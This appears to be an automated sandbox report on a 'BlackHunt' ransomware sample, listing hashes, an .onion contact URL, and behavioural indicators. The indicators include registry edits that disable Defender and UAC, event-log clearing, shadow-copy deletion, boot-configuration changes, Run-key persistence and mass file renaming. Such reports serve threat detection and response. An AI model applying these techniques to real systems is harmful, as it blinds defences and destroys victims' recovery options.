Analysis
-
max time kernel
172s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:34
Static task
static1
Behavioral task
behavioral1
Sample
637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe
Resource
win10v2004-20231215-en
General
-
Target
637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe
-
Size
707KB
-
MD5
b58a13776b3ee9f7f85d0462328c72f9
-
SHA1
8de12f63be6362413d392bf0c1edb61aae74086b
-
SHA256
637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a
-
SHA512
fec165985582c9e40234214d176aba5788d44b250c85fda2e56518d05b7e8576e1c811b7f817f69fa8e92e4f903d8fa19621c15794624858cb7d7f41554234f1
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1A8avnh:6uaTmkZJ+naie5OTamgEoKxLWL0h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5840 fsutil.exe 9036 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1164 wevtutil.exe 8936 wevtutil.exe 5336 wevtutil.exe 8804 wevtutil.exe 8728 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5848 bcdedit.exe 5860 bcdedit.exe 1888 bcdedit.exe 9104 bcdedit.exe -
Renames multiple (1605) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4364 wbadmin.exe 5540 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\X: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\B: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\N: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\O: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\G: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\J: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\Q: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\U: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\E: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\L: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\V: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\W: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\I: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\A: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\Z: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\T: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\Y: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\S: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\H: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\K: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\tools.jar 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reject_18.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nothumbnail_34.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_export_18.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\collect_feedback\js\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\eu-es\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\organize.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateDCFiles_280x192.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_Private.key 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_CN.properties 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\access-bridge-64.jar 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#BlackHunt_ReadMe.hta 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklist 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_ReadMe.txt 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxUnselected.svg 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1600 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4872 vssadmin.exe 7732 vssadmin.exe 8956 vssadmin.exe 3104 vssadmin.exe 3328 vssadmin.exe 4528 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 9168 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeRestorePrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeBackupPrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeTakeOwnershipPrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeAuditPrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeSecurityPrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeIncBasePriorityPrivilege 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Token: SeBackupPrivilege 3444 vssvc.exe Token: SeRestorePrivilege 3444 vssvc.exe Token: SeAuditPrivilege 3444 vssvc.exe Token: SeBackupPrivilege 3500 wbengine.exe Token: SeRestorePrivilege 3500 wbengine.exe Token: SeSecurityPrivilege 3500 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 880 wrote to memory of 2608 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 92 PID 880 wrote to memory of 2608 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 92 PID 2608 wrote to memory of 2340 2608 cmd.exe 94 PID 2608 wrote to memory of 2340 2608 cmd.exe 94 PID 880 wrote to memory of 3996 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 95 PID 880 wrote to memory of 3996 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 95 PID 880 wrote to memory of 4916 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 97 PID 880 wrote to memory of 4916 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 97 PID 880 wrote to memory of 4176 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 99 PID 880 wrote to memory of 4176 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 99 PID 880 wrote to memory of 3172 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 101 PID 880 wrote to memory of 3172 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 101 PID 3996 wrote to memory of 3500 3996 cmd.exe 103 PID 3996 wrote to memory of 3500 3996 cmd.exe 103 PID 4916 wrote to memory of 4608 4916 cmd.exe 104 PID 4916 wrote to memory of 4608 4916 cmd.exe 104 PID 4176 wrote to memory of 4000 4176 cmd.exe 105 PID 4176 wrote to memory of 4000 4176 cmd.exe 105 PID 3172 wrote to memory of 3408 3172 cmd.exe 106 PID 3172 wrote to memory of 3408 3172 cmd.exe 106 PID 880 wrote to memory of 3116 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 108 PID 880 wrote to memory of 3116 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 108 PID 880 wrote to memory of 4368 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 110 PID 880 wrote to memory of 4368 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 110 PID 880 wrote to memory of 2208 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 111 PID 880 wrote to memory of 2208 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 111 PID 880 wrote to memory of 2872 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 114 PID 880 wrote to memory of 2872 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 114 PID 880 wrote to memory of 1828 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 116 PID 880 wrote to memory of 1828 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 116 PID 880 wrote to memory of 4088 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 118 PID 880 wrote to memory of 4088 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 118 PID 880 wrote to memory of 4528 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 119 PID 880 wrote to memory of 4528 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 119 PID 880 wrote to memory of 4140 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 124 PID 880 wrote to memory of 4140 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 124 PID 880 wrote to memory of 3860 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 122 PID 880 wrote to memory of 3860 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 122 PID 880 wrote to memory of 2996 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 126 PID 880 wrote to memory of 2996 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 126 PID 2208 wrote to memory of 3428 2208 cmd.exe 128 PID 2208 wrote to memory of 3428 2208 cmd.exe 128 PID 880 wrote to memory of 688 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 132 PID 880 wrote to memory of 688 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 132 PID 880 wrote to memory of 1932 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 129 PID 880 wrote to memory of 1932 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 129 PID 3116 wrote to memory of 